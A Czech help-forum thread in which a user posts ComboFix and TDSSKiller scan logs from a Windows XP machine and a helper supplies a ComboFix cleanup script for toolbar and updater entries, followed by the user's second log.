06:01:56.0203 0592 [ 0171CFF34BBA8C5977F18C48D8AEF8C6 ] Wmi C:\WINDOWS\System32\advapi32.dll
06:01:56.0203 0592 Wmi - ok
06:01:56.0250 0592 [ C42584FD66CE9E17403AEBCA199F7BDB ] WmiAcpi C:\WINDOWS\system32\DRIVERS\wmiacpi.sys
06:01:56.0250 0592 WmiAcpi - ok
06:01:56.0328 0592 [ 23F6F03272F7E5679F1F050AED5ACEE6 ] WmiApSrv C:\WINDOWS\system32\wbem\wmiapsrv.exe
06:01:56.0328 0592 WmiApSrv - ok
06:01:56.0437 0592 [ 3739866D20ABD42F26A7B85F9E2560AF ] WMPNetworkSvc C:\Program Files\Windows Media Player\WMPNetwk.exe
06:01:56.0453 0592 WMPNetworkSvc - ok
06:01:56.0515 0592 [ 6ABE6E225ADB5A751622A9CC3BC19CE8 ] WS2IFSL C:\WINDOWS\System32\drivers\ws2ifsl.sys
06:01:56.0515 0592 WS2IFSL - ok
06:01:56.0578 0592 [ 4C86D5FAF78194995AF9CC1075F65DD3 ] wscsvc C:\WINDOWS\system32\wscsvc.dll
06:01:56.0578 0592 wscsvc - ok
06:01:56.0625 0592 [ C98B39829C2BBD34E454150633C62C78 ] WSTCODEC C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS
06:01:56.0640 0592 WSTCODEC - ok
06:01:56.0687 0592 [ C1364564800EE9784192145324A23308 ] wuauserv C:\WINDOWS\system32\wuauserv.dll
06:01:56.0703 0592 wuauserv - ok
06:01:56.0750 0592 [ F15FEAFFFBB3644CCC80C5DA584E6311 ] WudfPf C:\WINDOWS\system32\DRIVERS\WudfPf.sys
06:01:56.0750 0592 WudfPf - ok
06:01:56.0812 0592 [ 05231C04253C5BC30B26CBAAE680ED89 ] WudfSvc C:\WINDOWS\System32\WUDFSvc.dll
06:01:56.0812 0592 WudfSvc - ok
06:01:56.0906 0592 [ A27D4BA7264C0BF52F32D10405BEA1D4 ] WZCSVC C:\WINDOWS\System32\wzcsvc.dll
06:01:56.0921 0592 WZCSVC - ok
06:01:56.0968 0592 [ EAA4BB9EDB3FB10CF8979FE65E63658F ] xmlprov C:\WINDOWS\System32\xmlprov.dll
06:01:56.0968 0592 xmlprov - ok
06:01:57.0015 0592 [ 40AC8590CC9006DBB99FFCB37879D4C6 ] zntport C:\WINDOWS\system32\drivers\zntport.sys
06:01:57.0015 0592 zntport - ok
06:01:57.0093 0592 ================ Scan global ===============================
06:01:57.0156 0592 [ F36278E42C8C5DF03CE17DAC8231C91C ] C:\WINDOWS\system32\basesrv.dll
06:01:57.0203 0592 [ F3FA14A297BC687D0B51289D034033C9 ] C:\WINDOWS\system32\winsrv.dll
06:01:57.0234 0592 [ F3FA14A297BC687D0B51289D034033C9 ] C:\WINDOWS\system32\winsrv.dll
06:01:57.0265 0592 [ 9EF697AF07BB8DD82C3B02CA953A95B7 ] C:\WINDOWS\system32\services.exe
06:01:57.0265 0592 [Global] - ok
06:01:57.0265 0592 ================ Scan MBR ==================================
06:01:57.0312 0592 [ 99852D5C3A78447C3D6D82B6155FE848 ] \Device\Harddisk0\DR0
06:02:00.0375 0592 \Device\Harddisk0\DR0 - ok
06:02:00.0390 0592 ================ Scan VBR ==================================
06:02:00.0406 0592 [ 51D81A34AE7CE260D29323EEB60F0D14 ] \Device\Harddisk0\DR0\Partition1
06:02:00.0406 0592 \Device\Harddisk0\DR0\Partition1 - ok
06:02:00.0437 0592 [ 9DA179B0666C2AC067B504C4B5643FD0 ] \Device\Harddisk0\DR0\Partition2
06:02:00.0437 0592 \Device\Harddisk0\DR0\Partition2 - ok
06:02:00.0437 0592 ============================================================
06:02:00.0437 0592 Scan finished
06:02:00.0437 0592 ============================================================
06:02:00.0484 0584 Detected object count: 0
06:02:00.0484 0584 Actual detected object count: 0
06:03:47.0578 3992 Deinitialize success
------------------------------------------------------------------------------------------------------------------------

ComboFix 12-08-25.04 - Ester 28.08.2012 6:17.4.1 - x86
Systém Microsoft Windows XP Professional 5.1.2600.3.1250.420.1029.18.2038.1527 [GMT 2:00]
Spuštěný z: c:\documents and settings\Ester\Plocha\ComboFix.exe
AV: Avira Desktop *Disabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
* Vytvořen nový Bod Obnovení
.
.
((((((((((((((((((((((((((((((((((((((( Ostatní výmazy )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\Ester\P-7-78-8964-9648-3874
c:\windows\msmqinst.log
c:\windows\system32\PowerToyReadme.htm
c:\windows\system32\URTTemp
c:\windows\system32\URTTemp\fusion.dll
c:\windows\system32\URTTemp\mscoree.dll
c:\windows\system32\URTTemp\mscoree.dll.local
c:\windows\system32\URTTemp\mscorsn.dll
c:\windows\system32\URTTemp\mscorwks.dll
c:\windows\system32\URTTemp\msvcr71.dll
c:\windows\system32\URTTemp\regtlib.exe
.
.
((((((((((((((((((((((((( Soubory vytvořené od 2012-07-28 do 2012-08-28 )))))))))))))))))))))))))))))))
.
.
2012-08-24 05:11 . 2012-08-24 05:11 -------- d-----w- c:\documents and settings\Ester\Data aplikací\Avira
2012-08-24 05:05 . 2012-07-18 16:05 83392 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2012-08-24 05:05 . 2012-07-18 16:05 36000 ----a-w- c:\windows\system32\drivers\avkmgr.sys
2012-08-24 05:05 . 2012-07-18 16:05 137928 ----a-w- c:\windows\system32\drivers\avipbb.sys
2012-08-24 05:05 . 2012-08-24 05:05 -------- d-----w- c:\program files\Avira
2012-08-23 18:32 . 2012-08-28 03:24 -------- d-----w- c:\program files\Ask.com
2012-08-23 18:32 . 2012-08-23 18:47 -------- d-----w- c:\documents and settings\Ester\Local Settings\Data aplikací\AskToolbar
2012-08-23 18:32 . 2012-08-23 18:32 -------- d-----w- c:\documents and settings\Ester\Local Settings\Data aplikací\APN
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M výpis ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-07-22 13:24 . 2012-07-22 13:24 73728 ----a-w- c:\windows\system32\javacpl.cpl
2012-07-22 13:24 . 2012-07-22 13:24 476976 ----a-w- c:\windows\system32\npdeployJava1.dll
2012-07-22 13:24 . 2011-04-10 12:51 472880 ----a-w- c:\windows\system32\deployJava1.dll
2012-07-08 23:16 . 2012-07-09 14:35 207 ----a-w- c:\documents and settings\Ester\live.vbs
2012-07-06 13:58 . 2004-08-18 03:00 78336 ----a-w- c:\windows\system32\browser.dll
2012-07-04 14:05 . 2004-08-18 03:00 139784 ----a-w- c:\windows\system32\drivers\rdpwd.sys
2012-07-03 18:22 . 2007-03-08 15:36 1866112 ----a-w- c:\windows\system32\win32k.sys
2012-07-03 11:46 . 2011-10-09 15:34 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-07-02 17:38 . 2007-04-18 12:32 916992 ----a-w- c:\windows\system32\wininet.dll
2012-07-02 17:38 . 2004-08-18 03:00 43520 ----a-w- c:\windows\system32\licmgr10.dll
2012-07-02 17:38 . 2004-08-18 03:00 1469440 ------w- c:\windows\system32\inetcpl.cpl
2012-07-02 12:05 . 2004-08-18 03:00 385024 ----a-w- c:\windows\system32\html.iec
2012-06-25 14:04 . 2012-06-25 14:04 1394248 ----a-w- c:\windows\system32\msxml4.dll
2012-06-05 15:49 . 2007-05-15 14:43 1372672 ----a-w- c:\windows\system32\msxml6.dll
2012-06-05 15:49 . 2004-08-18 03:00 1172480 ----a-w- c:\windows\system32\msxml3.dll
2012-06-04 04:32 . 2007-04-25 14:22 152576 ----a-w- c:\windows\system32\schannel.dll
2012-06-02 13:19 . 2007-07-30 18:19 15384 ----a-w- c:\windows\system32\wuaucpl.cpl.mui
2012-06-02 13:19 . 2007-07-30 18:18 22552 ----a-w- c:\windows\system32\wucltui.dll.mui
2012-06-02 13:19 . 2004-08-18 03:00 329240 ----a-w- c:\windows\system32\wucltui.dll
2012-06-02 13:19 . 2004-08-18 03:00 219160 ----a-w- c:\windows\system32\wuaucpl.cpl
2012-06-02 13:19 . 2004-08-18 03:00 210968 ----a-w- c:\windows\system32\wuweb.dll
2012-06-02 13:19 . 2007-07-30 18:19 15384 ----a-w- c:\windows\system32\wuapi.dll.mui
2012-06-02 13:19 . 2007-07-30 18:19 45080 ----a-w- c:\windows\system32\wups2.dll
2012-06-02 13:19 . 2007-07-30 18:18 18456 ----a-w- c:\windows\system32\wuaueng.dll.mui
2012-06-02 13:19 . 2004-08-18 03:00 97304 ----a-w- c:\windows\system32\cdm.dll
2012-06-02 13:19 . 2004-08-18 03:00 53784 ----a-w- c:\windows\system32\wuauclt.exe
2012-06-02 13:19 . 2004-08-18 03:00 35864 ----a-w- c:\windows\system32\wups.dll
2012-06-02 13:19 . 2004-08-18 03:00 577048 ----a-w- c:\windows\system32\wuapi.dll
2012-06-02 13:19 . 2004-08-18 03:00 1933848 ----a-w- c:\windows\system32\wuaueng.dll
2012-06-02 13:19 . 2010-03-05 21:21 17648 ----a-w- c:\windows\system32\mucltui.dll.mui
2012-06-02 13:18 . 2010-03-05 21:21 275696 ----a-w- c:\windows\system32\mucltui.dll
2012-06-02 13:18 . 2009-08-06 18:23 214256 ----a-w- c:\windows\system32\muweb.dll
2012-05-31 13:22 . 2004-08-18 03:00 602112 ----a-w- c:\windows\system32\crypt32.dll
2004-10-01 13:00 . 2010-07-24 19:32 40960 ----a-w- c:\program files\Uninstall_CDS.exe
.
.
(((((((((((((((((((((((((((((((((( Spouštěcí body v registru )))))))))))))))))))))))))))))))))))))))))))))
.
.
*Poznámka* prázdné záznamy a legitimní výchozí údaje nejsou zobrazeny.
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Shadow"="c:\program files\NewTech Infosystems\NTI Shadow\Shadow.exe" [2007-06-29 503808]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2012-02-25 39408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ePower_DMC"="c:\acer\Empowering Technology\ePower\ePower_DMC.exe" [2007-07-04 475136]
"Boot"="c:\acer\Empowering Technology\ePower\Boot.exe" [2006-03-15 579584]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2012-07-18 348664]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]
"DWQueuedReporting"="c:\progra~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" [2008-11-04 435096]
.
c:\documents and settings\Ester\Nabídka Start\Programy\Po spuštění\
Stickies.lnk - c:\program files\Stickies\stickies.exe [2011-10-29 1130496]
.
c:\documents and settings\All Users\Nabídka Start\Programy\Po spuštění\
Acer Empowering Technology.lnk - c:\acer\Empowering Technology\Acer.Empowering.Framework.Launcher.exe [2011-7-19 45056]
Evernote Clipper.lnk - c:\windows\Installer\{F761359C-9CED-45AE-9A51-9D6605CD55C4}\Evernote.ico [2011-10-28 293950]
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend]
@=""
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2012-01-03 07:37 843712 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LanguageShortcut]
2007-01-08 20:17 52256 ----a-w- c:\program files\CyberLink\PowerDVD\Language\Language.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Malwarebytes Anti-Malware]
2012-07-03 11:46 462920 ----a-w- c:\program files\Malwarebytes' Anti-Malware\mbamgui.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2008-04-14 03:22 1695232 ----a-w- c:\program files\Messenger\msmsgs.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\ICQ7.7\\ICQ.exe"=
"c:\documents and settings\Ester\P-7-78-8964-9648-3874\windll.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
.
R0 SmartDefragDriver;SmartDefragDriver;c:\windows\system32\drivers\SmartDefragDriver.sys [3.2.2012 9:43 14776]
R1 avkmgr;avkmgr;c:\windows\system32\drivers\avkmgr.sys [24.8.2012 7:05 36000]
R2 602XML Updater;602Updater;c:\program files\Common Files\soft602\602updsvc\602updsvc.exe [10.10.2011 13:55 85344]
R2 AntiVirSchedulerService;Avira Scheduler;c:\program files\Avira\AntiVir Desktop\sched.exe [24.8.2012 7:05 86224]
R2 AntiVirWebService;Avira Web Protection;c:\program files\Avira\AntiVir Desktop\avwebgrd.exe [24.8.2012 7:05 465360]
R2 cpuz135;cpuz135;c:\windows\system32\drivers\cpuz135_x32.sys [9.7.2011 12:21 21992]
S2 gupdate1ca9d1ab21a2990;Služba Google Update (gupdate1ca9d1ab21a2990);c:\program files\Google\Update\GoogleUpdate.exe [24.1.2010 19:28 133104]
S2 SkypeUpdate;Skype Updater;c:\program files\Skype\Updater\Updater.exe [3.7.2012 13:19 160944]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [14.5.2012 23:04 257696]
S3 DrvAgent32;DrvAgent32;c:\windows\system32\drivers\DrvAgent32.sys [22.5.2011 9:42 23456]
S3 gupdatem;Služba Google Update (gupdatem);c:\program files\Google\Update\GoogleUpdate.exe [24.1.2010 19:28 133104]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\System32\svchost.exe -k nosGetPlusHelper [18.8.2004 5:00 14336]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
nosGetPlusHelper REG_MULTI_SZ nosGetPlusHelper
.
Obsah adresáře 'Naplánované úlohy'
.
2012-08-28 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-14 21:04]
.
2012-08-28 c:\windows\Tasks\GoogleUpdateTaskMachineCore1cd5f8595cdb36c.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-24 17:28]
.
2012-08-28 c:\windows\Tasks\User_Feed_Synchronization-{8FDA357B-9004-4B4C-91DA-E15FEFCEFBDF}.job
- c:\windows\system32\msfeedssync.exe [2007-08-13 02:31]
.
2012-05-23 c:\windows\Tasks\Wise Disk Cleaner Schedule Task.job
- c:\program files\Wise Disk Cleaner\WiseDiskCleaner.exe [2012-02-02 18:38]
.
2012-05-23 c:\windows\Tasks\Wise Registry Cleaner Schedule Task.job
- c:\program files\Wise Registry Cleaner\WiseRegCleaner.exe [2012-02-02 22:45]
.
.
------- Doplňkový sken -------
.
uStart Page = hxxp://search.avira.com/?l=dis&o=APN104 ... cale=en_CZ
uSearchMigratedDefaultURL =
IE: Add to Evernote 4.0 - c:\program files\Evernote\Evernote\EvernoteIE.dll/204
IE: E&xportovat do aplikace Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
IE: {{77F665FD-3F60-4B0A-AE14-EC124B7A7FCE} - c:\program files\ICQ7.7\ICQ.exe
LSP: c:\program files\Avira\AntiVir Desktop\avsda.dll
Trusted Zone: postovnisporitelna.cz\maxibps
TCP: Interfaces\{E5EB13B7-6964-469C-B595-E27F5E8665C5}: NameServer = 10.107.4.100,10.107.4.129
DPF: {672EE252-D813-4F5E-81BB-5DD163DD4FA5} - hxxps://www.mojedatovaschranka.cz/stati ... ctivex.cab
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-08-28 06:23
Windows 5.1.2600 Service Pack 3 NTFS
.
skenování skrytých procesů ...
.
skenování skrytých položek 'Po spuštění' ...
.
skenování skrytých souborů ...
.
sken byl úspešně dokončen
skryté soubory: 0
.
**************************************************************************
.
--------------------- ZAMKNUTÉ KLÍČE V REGISTRU ---------------------
.
[HKEY_USERS\S-1-5-21-1871938407-2727508527-3954083314-1008\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- Knihovny navázané na běžící procesy ---------------------
.
- - - - - - - > 'lsass.exe'(800)
c:\program files\Avira\AntiVir Desktop\avsda.dll
.
Celkový čas: 2012-08-28 06:26:49
ComboFix-quarantined-files.txt 2012-08-28 04:26
.
Před spuštěním: 2 843 942 912
Po spuštění: 2 776 555 520
.
- - End Of File - - 8BCADEACF3D588BBDBEC6061B2E53C5C

Příspěvekod **memphisto** » 29 srp 2012 10:07

Máš strašně málo volného místa na systémovém disku. Něco uvolni. Způsobuje to jistě problémy s rychlostí systému.

Otevři si Poznámkový blok (Start -> Spustit... a napiš do okna Notepad a dej Ok.
Zkopíruj do něj následující celý text označený zeleně:
Poznámka: Nepoužij k označení skriptu funkci VYBRAT VŠE

Kód: Vybrat vše

KillAll::
Folder::
c:\program files\Ask.com
c:\documents and settings\Ester\Local Settings\Data aplikací\AskToolbar

Driver::
cpuz135
gupdate1ca9d1ab21a2990
SkypeUpdate
gupdatem

File::
c:\windows\system32\drivers\cpuz135_x32.sys
c:\program files\Google\Update\GoogleUpdate.exe
c:\program files\Skype\Updater\Updater.exe
c:\windows\Tasks\GoogleUpdateTaskMachineCore1cd5f8595cdb36c.job

DDS::
uStart Page = hxxp://search.avira.com/?l=dis&o=APN104 ... cale=en_CZ
uSearchMigratedDefaultURL =

Zvol možnost Soubor -> Uložit jako... a nastav tyto parametry:
Název souboru: zde napiš: CFScript.txt
Uložit jako typ: tak tam vyber Všechny soubory
Ulož soubor na plochu.
Ukonči všechna aktivní okna.

Uchop myší vytvořený skript CFScript.txt, přemísti ho nad stažený program ComboFix.exe a když se oba soubory překryjí, skript upus.
- Automaticky se spustí ComboFix
- Vlož sem log, který vyběhne v závěru čistícího procesu

yeewf7 · Příspěvekod **yeewf7** » 30 srp 2012 12:27

aha, systemovej disk, to je C:\ ? kolik mista by tam melo byt? je tam neco pres 2 GB. takze musim neco odinstalovat?

ComboFix 12-08-29.03 - Ester 30.08.2012 12:04:28.6.1 - x86
Systém Microsoft Windows XP Professional 5.1.2600.3.1250.420.1029.18.2038.1573 [GMT 2:00]
Spuštěný z: c:\documents and settings\Ester\Plocha\ComboFix.exe
Použité ovládací přepínače :: c:\documents and settings\Ester\Plocha\CFScript.txt
AV: Avira Desktop *Disabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
FILE ::
"c:\program files\Google\Update\GoogleUpdate.exe"
"c:\program files\Skype\Updater\Updater.exe"
"c:\windows\system32\drivers\cpuz135_x32.sys"
"c:\windows\Tasks\GoogleUpdateTaskMachineCore1cd5f8595cdb36c.job"
.
.
((((((((((((((((((((((((((((((((((((((( Ostatní výmazy )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
((((((((((((((((((((((((((((((((((((((( Ovladače/Služby )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_CPUZ135
-------\Legacy_GUPDATE1CA9D1AB21A2990
-------\Legacy_GUPDATEM
-------\Legacy_SKYPEUPDATE
-------\Service_cpuz135
-------\Service_gupdate1ca9d1ab21a2990
-------\Service_gupdatem
-------\Service_SkypeUpdate
.
.
((((((((((((((((((((((((( Soubory vytvořené od 2012-07-28 do 2012-08-30 )))))))))))))))))))))))))))))))
.
.
2012-08-24 05:11 . 2012-08-24 05:11 -------- d-----w- c:\documents and settings\Ester\Data aplikací\Avira
2012-08-24 05:05 . 2012-07-18 16:05 83392 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2012-08-24 05:05 . 2012-07-18 16:05 36000 ----a-w- c:\windows\system32\drivers\avkmgr.sys
2012-08-24 05:05 . 2012-07-18 16:05 137928 ----a-w- c:\windows\system32\drivers\avipbb.sys
2012-08-24 05:05 . 2012-08-24 05:05 -------- d-----w- c:\program files\Avira
2012-08-23 18:32 . 2012-08-23 18:32 -------- d-----w- c:\documents and settings\Ester\Local Settings\Data aplikací\APN
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M výpis ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-07-22 13:24 . 2012-07-22 13:24 73728 ----a-w- c:\windows\system32\javacpl.cpl
2012-07-22 13:24 . 2012-07-22 13:24 476976 ----a-w- c:\windows\system32\npdeployJava1.dll
2012-07-22 13:24 . 2011-04-10 12:51 472880 ----a-w- c:\windows\system32\deployJava1.dll
2012-07-08 23:16 . 2012-07-09 14:35 207 ----a-w- c:\documents and settings\Ester\live.vbs
2012-07-06 13:58 . 2004-08-18 03:00 78336 ----a-w- c:\windows\system32\browser.dll
2012-07-04 14:05 . 2004-08-18 03:00 139784 ----a-w- c:\windows\system32\drivers\rdpwd.sys
2012-07-03 18:22 . 2007-03-08 15:36 1866112 ----a-w- c:\windows\system32\win32k.sys
2012-07-03 11:46 . 2011-10-09 15:34 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-07-02 17:38 . 2007-04-18 12:32 916992 ----a-w- c:\windows\system32\wininet.dll
2012-07-02 17:38 . 2004-08-18 03:00 43520 ----a-w- c:\windows\system32\licmgr10.dll
2012-07-02 17:38 . 2004-08-18 03:00 1469440 ------w- c:\windows\system32\inetcpl.cpl
2012-07-02 12:05 . 2004-08-18 03:00 385024 ----a-w- c:\windows\system32\html.iec
2012-06-25 14:04 . 2012-06-25 14:04 1394248 ----a-w- c:\windows\system32\msxml4.dll
2012-06-05 15:49 . 2007-05-15 14:43 1372672 ----a-w- c:\windows\system32\msxml6.dll
2012-06-05 15:49 . 2004-08-18 03:00 1172480 ----a-w- c:\windows\system32\msxml3.dll
2012-06-04 04:32 . 2007-04-25 14:22 152576 ----a-w- c:\windows\system32\schannel.dll
2012-06-02 13:19 . 2007-07-30 18:19 15384 ----a-w- c:\windows\system32\wuaucpl.cpl.mui
2012-06-02 13:19 . 2007-07-30 18:18 22552 ----a-w- c:\windows\system32\wucltui.dll.mui
2012-06-02 13:19 . 2004-08-18 03:00 329240 ----a-w- c:\windows\system32\wucltui.dll
2012-06-02 13:19 . 2004-08-18 03:00 219160 ----a-w- c:\windows\system32\wuaucpl.cpl
2012-06-02 13:19 . 2004-08-18 03:00 210968 ----a-w- c:\windows\system32\wuweb.dll
2012-06-02 13:19 . 2007-07-30 18:19 15384 ----a-w- c:\windows\system32\wuapi.dll.mui
2012-06-02 13:19 . 2007-07-30 18:19 45080 ----a-w- c:\windows\system32\wups2.dll
2012-06-02 13:19 . 2007-07-30 18:18 18456 ----a-w- c:\windows\system32\wuaueng.dll.mui
2012-06-02 13:19 . 2004-08-18 03:00 97304 ----a-w- c:\windows\system32\cdm.dll
2012-06-02 13:19 . 2004-08-18 03:00 53784 ----a-w- c:\windows\system32\wuauclt.exe
2012-06-02 13:19 . 2004-08-18 03:00 35864 ----a-w- c:\windows\system32\wups.dll
2012-06-02 13:19 . 2004-08-18 03:00 577048 ----a-w- c:\windows\system32\wuapi.dll
2012-06-02 13:19 . 2004-08-18 03:00 1933848 ----a-w- c:\windows\system32\wuaueng.dll
2012-06-02 13:19 . 2010-03-05 21:21 17648 ----a-w- c:\windows\system32\mucltui.dll.mui
2012-06-02 13:18 . 2010-03-05 21:21 275696 ----a-w- c:\windows\system32\mucltui.dll
2012-06-02 13:18 . 2009-08-06 18:23 214256 ----a-w- c:\windows\system32\muweb.dll
2004-10-01 13:00 . 2010-07-24 19:32 40960 ----a-w- c:\program files\Uninstall_CDS.exe
.
.
((((((((((((((((((((((((((((( SnapShot@2012-08-28_04.24.02 )))))))))))))))))))))))))))))))))))))))))
.
+ 2012-08-30 08:36 . 2012-08-30 08:36 16384 c:\windows\temp\Perflib_Perfdata_9dc.dat
+ 2012-08-30 10:15 . 2012-08-30 10:15 16384 c:\windows\temp\Perflib_Perfdata_92c.dat
+ 2012-08-30 10:14 . 2012-08-30 10:14 16384 c:\windows\temp\Perflib_Perfdata_788.dat
.
(((((((((((((((((((((((((((((((((( Spouštěcí body v registru )))))))))))))))))))))))))))))))))))))))))))))
.
.
*Poznámka* prázdné záznamy a legitimní výchozí údaje nejsou zobrazeny.
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Shadow"="c:\program files\NewTech Infosystems\NTI Shadow\Shadow.exe" [2007-06-29 503808]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2012-02-25 39408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ePower_DMC"="c:\acer\Empowering Technology\ePower\ePower_DMC.exe" [2007-07-04 475136]
"Boot"="c:\acer\Empowering Technology\ePower\Boot.exe" [2006-03-15 579584]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2012-07-18 348664]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]
"DWQueuedReporting"="c:\progra~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" [2008-11-04 435096]
.
c:\documents and settings\Ester\Nabídka Start\Programy\Po spuštění\
Stickies.lnk - c:\program files\Stickies\stickies.exe [2011-10-29 1130496]
.
c:\documents and settings\All Users\Nabídka Start\Programy\Po spuštění\
Acer Empowering Technology.lnk - c:\acer\Empowering Technology\Acer.Empowering.Framework.Launcher.exe [2011-7-19 45056]
Evernote Clipper.lnk - c:\windows\Installer\{F761359C-9CED-45AE-9A51-9D6605CD55C4}\Evernote.ico [2011-10-28 293950]
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend]
@=""
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2012-01-03 07:37 843712 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LanguageShortcut]
2007-01-08 20:17 52256 ----a-w- c:\program files\CyberLink\PowerDVD\Language\Language.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Malwarebytes Anti-Malware]
2012-07-03 11:46 462920 ----a-w- c:\program files\Malwarebytes' Anti-Malware\mbamgui.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2008-04-14 03:22 1695232 ----a-w- c:\program files\Messenger\msmsgs.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\ICQ7.7\\ICQ.exe"=
"c:\documents and settings\Ester\P-7-78-8964-9648-3874\windll.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
.
R0 SmartDefragDriver;SmartDefragDriver;c:\windows\system32\drivers\SmartDefragDriver.sys [3.2.2012 9:43 14776]
R1 avkmgr;avkmgr;c:\windows\system32\drivers\avkmgr.sys [24.8.2012 7:05 36000]
R2 602XML Updater;602Updater;c:\program files\Common Files\soft602\602updsvc\602updsvc.exe [10.10.2011 13:55 85344]
R2 AntiVirSchedulerService;Avira Scheduler;c:\program files\Avira\AntiVir Desktop\sched.exe [24.8.2012 7:05 86224]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [14.5.2012 23:04 257696]
S3 DrvAgent32;DrvAgent32;c:\windows\system32\drivers\DrvAgent32.sys [22.5.2011 9:42 23456]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\System32\svchost.exe -k nosGetPlusHelper [18.8.2004 5:00 14336]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
nosGetPlusHelper REG_MULTI_SZ nosGetPlusHelper
.
Obsah adresáře 'Naplánované úlohy'
.
2012-08-30 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-14 21:04]
.
2012-08-30 c:\windows\Tasks\GoogleUpdateTaskMachineCore1cd5f8595cdb36c.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-24 17:28]
.
2012-08-30 c:\windows\Tasks\User_Feed_Synchronization-{8FDA357B-9004-4B4C-91DA-E15FEFCEFBDF}.job
- c:\windows\system32\msfeedssync.exe [2007-08-13 02:31]
.
2012-05-23 c:\windows\Tasks\Wise Disk Cleaner Schedule Task.job
- c:\program files\Wise Disk Cleaner\WiseDiskCleaner.exe [2012-02-02 18:38]
.
2012-05-23 c:\windows\Tasks\Wise Registry Cleaner Schedule Task.job
- c:\program files\Wise Registry Cleaner\WiseRegCleaner.exe [2012-02-02 22:45]
.
.
------- Doplňkový sken -------
.
IE: Add to Evernote 4.0 - c:\program files\Evernote\Evernote\EvernoteIE.dll/204
IE: E&xportovat do aplikace Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
